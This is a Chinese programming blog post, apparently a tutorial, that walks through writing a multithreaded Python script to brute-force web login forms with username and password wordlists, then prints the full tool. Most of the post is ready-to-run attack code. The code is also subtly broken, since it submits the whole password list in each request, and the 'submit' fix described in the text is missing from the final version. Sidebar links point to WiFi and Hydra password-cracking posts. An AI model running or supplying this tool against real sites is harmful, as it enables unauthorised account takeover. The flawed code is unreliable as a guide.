python编程第三站-在线密码破解工具

最新推荐文章于 2024-09-20 20:24:41 发布
最新推荐文章于 2024-09-20 20:24:41 发布
阅读量2.6k 收藏 4
点赞数 1
分类专栏: python安全脚本 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weare001/article/details/124685503
版权

目录

前言

一、在线密码破解介绍

1.什么是在线密码破解

2.web安全中用来破解的工具burpsuite

3.导入需要用到的python模块

二、命令行模块介绍

1.optparse模块介绍

2.web密码破解命令行读取模板编写

三、payload确定

1.思路

2.密码字典列表确定

四、多线程访问

1、python中的多线程

2、工具中使用多线程列表

五、功能模块编写

1.思路

2.python第三方库requests

六、功能测试 Bug修改

1、问题发现

2、Bug修改

完整代码如下:

前言

初学者者工具编写!

仅用学习使用,不做其他任何用途!

效果展示:

 

一、在线密码破解介绍

1.什么是在线密码破解

1)针对在线服务的认证凭证进行合法用户枚举

2)离线破解(拿到密文进行解密(如:md5))

2.web安全中用来破解的工具burpsuite

1)基于表单验证的破解

2)基于HTTP认证的破解

3.导入需要用到的python模块

import optparse,threading,math,requests

二、命令行模块介绍

1.optparse模块介绍

        1)导入optparse

        2)初始化optparse.OptionParse

        3)设置初始对象的usage属性

        4)添加参数:parse.add_option('-u','--user_file',dest='username_file',help='read username from file',metavar='FILE',action='store',type='string')

        5)存储提交的命令行参数:(options,args)=parse.parse_args()

        6)测试输出:print(options.username_file)

parser = optparse.OptionParser()
parser.usage = '在线密码破解.py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)

# payload确定
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)

2.web密码破解命令行读取模板编写

        1)需读取用户名

        2)需读取用户密码

        3)需读取url

        4)需读取线程数

三、payload确定

1.思路

        用户名循环读取,密码根据线程数均分,用户名与密码组合,使用多线程扫描探测;

# 新建一个密码字典列表  [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
# 根据线程数,确定每一个项当中内容的行数
# 1)读取所有密码字典中的内容到要给的列表中,确定字典的行数
with open(pass_dic,'r') as f:
    temp_list = f.readlines()
    num = len(temp_list)
# print(temp_list)
# print(num)        # 20

2.密码字典列表确定

        根据线程数确定;

# 使用得到的临时列表的项数 除以 线程数  来确定每一个线程中的项数(向上取整)
    result = math.ceil(int(num)/int(ths))
    # print(result)   # 2
    result_num=result

    flag = 0
    for line in temp_list:
        flag += 1
        temp_thread_list.append(line.strip())
        if flag == result:
            flag = 0
            pass_list.append(temp_thread_list)
            temp_thread_list = []

# print(pass_list)
# print(type(pass_list))

四、多线程访问

1、python中的多线程

        import threading

        threading.Thread(target=(函数名),args=参数)

        开启线程 start()

2、工具中使用多线程列表

# payload  ->  pass_list 结合  用户名字典进行确定
# 使用线程列表
ths_list = []
with open(user_dic,'r') as f:
    user_list = f.readlines()
    for user in user_list:
        for pass_line in pass_list:
            payload = {'user':user.strip(),'pass':pass_line}
            # print(payload)
            ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
    th.start()

五、功能模块编写

1.思路

        根据返回的内容不同

        根据返回的长度

2.python第三方库requests

        import requests

        r = requests.post(url,data)

        len(r.text)

def scan(payload):
    # print(payload)
    user = payload['user']
    pass_list = payload['pass']
    useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
    for password in pass_list:
        r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
        print('URL:'+site+':  ''username:'+user+'  '+'password:'+password+'  '+'lenght:'+str(len(r.text))+'  '+str(r.status_code))
        # print(r.request.headers)

六、功能测试 Bug修改

1、问题发现

        很多时候直接破解其实是没有去尝试登陆的,返回长度不管正确与否都是一样的,可查看源代码或者审查元素,提交的参数中除了admin和password,还有submit。

2、Bug修改

        所以在date后还要将submit加进去

完整代码如下:

# coding=utf8
# @time:2022/5/9 15:04
# Author 浩宇

# 完整代码展示
import optparse,threading,math,requests

parser = optparse.OptionParser()
parser.usage = '在线密码破解.py -s url -u user_file -p pass_file -t num'
parser.add_option("-s","--site",help="website to test",action="store",type="string",metavar="url",dest="site")
parser.add_option("-u","--userfile",help="read username from file",action="store",type="string",metavar="FILE",dest="userfile")
parser.add_option("-p","--passfile",help="read pass from file",action="store",type="string",metavar="FILE",dest="passfile")
parser.add_option("-t","--threads",help="number of threads",action="store",type="string",metavar="THREADS",dest="threads")
(options,args) = parser.parse_args()
# print(options.site)
# print(options.usernamefile)
# print(options.passfile)
# print(options.threadsfile)

# payload确定
ths = options.threads
# print(ths)
# print(type(ths))
pass_dic = options.passfile
# print(pass_dic)
user_dic = options.userfile
# print(user_dic)
site = options.site
# print(site)


# 新建一个密码字典列表  [[],[],[],[]]
pass_list = []
result_num = 0
temp_thread_list = []
# 根据线程数,确定每一个项当中内容的行数
# 1)读取所有密码字典中的内容到要给的列表中,确定字典的行数
with open(pass_dic,'r') as f:
    temp_list = f.readlines()
    num = len(temp_list)
# print(temp_list)
# print(num)        # 20


# 2)使用得到的临时列表的项数 除以 线程数  来确定每一个线程中的项数(向上取整)
    result = math.ceil(int(num)/int(ths))
    # print(result)   # 2
    result_num=result

    flag = 0
    for line in temp_list:
        flag += 1
        temp_thread_list.append(line.strip())
        if flag == result:
            flag = 0
            pass_list.append(temp_thread_list)
            temp_thread_list = []

# print(pass_list)
# print(type(pass_list))

def scan(payload):
    # print(payload)
    user = payload['user']
    pass_list = payload['pass']
    useragent = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'}
    for password in pass_list:
        r = requests.post(url=site,data={'username':user,'password':pass_list},headers=useragent)
        print('URL:'+site+':  ''username:'+user+'  '+'password:'+password+'  '+'lenght:'+str(len(r.text))+'  '+str(r.status_code))
        # print(r.request.headers)



# 3)payload  ->  pass_list 结合  用户名字典进行确定
# 使用线程列表
ths_list = []
with open(user_dic,'r') as f:
    user_list = f.readlines()
    for user in user_list:
        for pass_line in pass_list:
            payload = {'user':user.strip(),'pass':pass_line}
            # print(payload)
            ths_list.append(threading.Thread(target=scan,args=(payload,)))
for th in ths_list:
    th.start()

更多安全分享,请关注【安全info】微信公众号!

流浪法师12
关注
专栏目录
Python零基础入门篇 - 02 - Python编程环境搭建 - Pycharm 简介、安装与配置
m0_63102527的博客
04-27 972
IDE 是集成开发环境的英文缩写 (Integrated Development Environment),集成开发环境就是将在开发过程中所需要的工具或功能集成到了一起,比如:代码编写、分析、编译、调试等功能,从而最大化地提高开发者的工作效率。IDE 通用特点:提供图形用户界面,在 IDE 中可以完成开发过程中所有工作;支持代码补全与检查,并提供快速修复选项;内置解释器与编译器;功能强大的调试器,支持设置断点与单步执行等功能。
Python攻防-暴力破解附近局域网WIFI密码
m0_52789121的博客
06-12 1003
本文将记录学习下如何通过 Python 脚本实现 WIFI 密码的暴力破解,从而实现免费蹭网。先来看看没有图形界面版的爆破脚本。 代码运行效果: 以上脚本需内嵌 WIFI 名、爆破字典路径,缺少灵活性。下面进行改造优化: 脚本运行效果如下: 上述代码实现了依据信号强度枚举当前附近的所有 WIFI 名称,并且可供用户自主选择需要暴力破解的 WIFI,同时还可灵活指定暴力破解的字典,相对而言体验感提升了不少。进一步也可以将上述脚本打包生成 exe 文件,双击运行效果如下: 下面基于 Python 的 GUI 图
Python bytecode pyc文件压缩、加密解密工具
02-02
压缩: 本工具支持使用bz2,lzma,zlib模块对pyc文件进行压缩, 并可还原已压缩的pyc文件。 加/解密: 支持通过字节码混淆来保护python代码, 使pyc文件无法被uncompyle6等库反编译。
字典制作、在线密码破解
分享学习网络的点点滴滴
09-06 1191
按个人信息生成其专属的密码字典。
分享63个Python爬虫源码
最新发布
gitblog_06566的博客
09-20 383
分享63个Python爬虫源码 分享63个Python爬虫源码总有一个是你想要的 项目地址: https://gitcode.com/Resource-Bundle-Collection/b43fc ...
【kali-密码攻击】(5.1.2)密码在线破解:Medusa
08-09 3937
【kali-密码攻击】密码在线破解:Medusa
python加密解密算法_python3 常见解密加密算法实例分析【base64、MD5等】
weixin_39698255的博客
11-20 241
本文实例讲述了python3 常见解密加密算法。分享给大家供大家参考,具体如下:一.使用base64Base64编码,64指A-Z、a-z、0-9、+和/这64个字符,还有“=”号不属于编码字符,而是填充字符。优点:方法简单缺点:不保险,别人拿到密文可以自己解密出明文编码原理:将3个字节转换成4个字节((3 X 8)=24=(4X6)),先读入3个字节,每读一个字节,左移8位,再右移四次,每次6位...
在线密码破解教程,web登录爆破(hydra的简单使用)
热门推荐
weixin_43039349的博客
04-16 13万+
hydra是一个极其强大的在线破解密码工具(人称爆破神器) ——本文献给无聊的计算机系大学生们 密码破解从大类来分可以分为两种,一种是在线破解,这种方hydra式一般要求待破解的对象对我们来说是可以正常提供服务的,通俗来讲就是能够让我们通过一定的途径去尝试登录,或者是验证用户密码的正确性。而另一种就是本地破解,比如wifi抓包破解wifi密码,只要提前抓到了wifi登录验证的数据包,就可以在本地...
15天精通Python-Python总结-Python基础-pyhthon小代码.docx
06-11
例如,`s[1]`可以获取列表或元组的第二个元素,`s[1:3]`则获取第二个到第三个元素的子序列,`len(s)`则返回序列的长度。Python还提供了多种内置函数来处理序列,如`append()`、`extend()`、`insert()`等,用于增加、...
12岁小读者使用Python暴力破解Wi-Fi密码
一行玩python
08-27 2453
这一代后浪在父母的光环加持下,猛点技能点。有些从小学开始敲基因,有些一天能写2000首诗,有些发表的论文已经达到硕士毕业水平。但是在编程领域还有另外一群后浪,有些仅仅靠着自己的自学开始做...
Python破解wifi密码工具
02-13
使用Python的pywifi模块破解wifi密码的所有所需工具
011_Python字典_项目_MD5在线加密解密工具
煮面要加牛奶的博客
12-07 598
相信学习
【kali-密码攻击】(5.1.1)密码在线破解:Hydra(图形界面)
08-09 5845
【kali-密码攻击】Hydra(图形界面)
基于Python实现一个在线加密解密网站系统
Saki_Python的博客
09-13 730
简单来说,加密就是将信息(例如一段文本)转换成一种只有拥有特定密钥的人才能理解的格式。而解密则是相反的过程,使用同样的密钥将加密的信息恢复成原始格式。在这篇文章中,我们探讨了如何使用Python的cryptography库和Flask框架构建一个简单的加密解密系统。尽管这只是一个基础的示例,但它为我们展示了密码学的强大功能,并为进一步的探索打开了大门。随着数字化时代的到来,学习和理解加密技术变得越来越重要。希望这篇文章能激发你对这一领域的兴趣,鼓励你深入研究并构建更加复杂的加密应用。
Python 全自动解密解码神器 — Ciphey
Python实用宝典网
07-20 3482
Ciphey 是一个使用自然语言处理和人工智能的全自动解密/解码/破解工具。简单地来讲,你只需要输入加密文本,它就能给你返回解密文本。就是这么牛逼。有了Ciphey,你根本不需要知道你的密...
Kali-linux密码在线破解
2301_77162959的博客
05-20 2521
为了使用户能成功登录到目标系统,所以需要获取一个正确的密码。在Kali中,在线破解密码工具很多,其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解
Python Tkinter:开发一款文件加密解密工具
AI数据工厂
07-01 1174
介绍了一款自行研发的文件加解密的小工具,可以从源码/可执行程序运行。
Python工具——开发一个加密解密的小应用 & windows下可执行文件exe制作
Arya的博客,专注后端领域
12-27 1389
基于python开发小工具,加密解密的exe文件,可以用于加密图片,word,压缩包等。
Python 'capture-the-flag-0.0.4'库发布及安装指南
3. **Python开发语言**: Python是一种广泛使用的高级编程语言,以其可读性强和简洁的语法著称。它支持多种编程范式,包括面向对象、命令式、函数式和过程式编程Python广泛应用于网站开发、自动化、数据分析、人工...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值